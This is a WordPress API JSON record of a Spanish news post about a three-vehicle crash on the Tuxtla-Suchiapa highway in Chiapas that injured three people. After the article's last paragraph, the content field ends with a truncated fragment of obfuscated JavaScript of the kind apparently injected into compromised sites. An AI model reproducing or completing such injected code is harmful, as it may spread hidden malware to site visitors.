{"id":9508,"date":"2023-04-12T02:01:09","date_gmt":"2023-04-12T02:01:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9508"},"modified":"2023-04-12T02:01:10","modified_gmt":"2023-04-12T02:01:10","slug":"tres-lesionados-saldo-de-accidente-en-el-tramo-tuxtla-suchiapa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9508","title":{"rendered":"Tres lesionados saldo de accidente en el tramo Tuxtla-Suchiapa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681264799771.jpg\" alt=\"\" class=\"wp-image-9509\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681264799771.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681264799771-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 11 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este martes se registr\u00f3 un fuerte accidente de tr\u00e1nsito en el tramo Tuxtla-Suchiapa a la altura del ejido El Jobo, dejando como saldo tres personas heridas.<\/p>\n\n\n\n<p>De acuerdo con los reportes de tr\u00e1nsito, este hecho ocurri\u00f3 cuando una camioneta Suv de color gris Jeep Renegade corr\u00eda en el sentido de Norte a Sur y de un momento a otro el conductor perdi\u00f3 el control invadiendo el carril, lo que ocasion\u00f3 que se impactara de frente contra un Chevrolet Sonic de color blanco.<\/p>\n\n\n\n<p>Este golpe ocasion\u00f3 que, otro coche Chevrolet Aveo de color blanco se estrell\u00f3 contra el Sonic.<\/p>\n\n\n\n<p>Por el choque los ocupantes salieron volando y presentaron diferentes heridas.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil del Estado para auxiliar a los heridos pero ninguno fue trasladado a un nosocomio.<\/p>\n\n\n\n<p>En el lugar el responsable se hizo cargo del accidente por una p\u00f3liza de seguro automotriz y garantiz\u00f3 el pago de los da\u00f1os.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 11 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este martes se registr\u00f3 un fuerte accidente de tr\u00e1nsito en el tramo Tuxtla-Suchiapa a la altura del ejido El Jobo, dejando como saldo tres personas heridas. De acuerdo con los reportes de tr\u00e1nsito, este hecho ocurri\u00f3 cuando una camioneta Suv de color gris Jeep &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9509,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9508","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9508","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9508"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9508\/revisions"}],"predecessor-version":[{"id":9510,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9508\/revisions\/9510"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9509"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9508"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9508"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9508"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}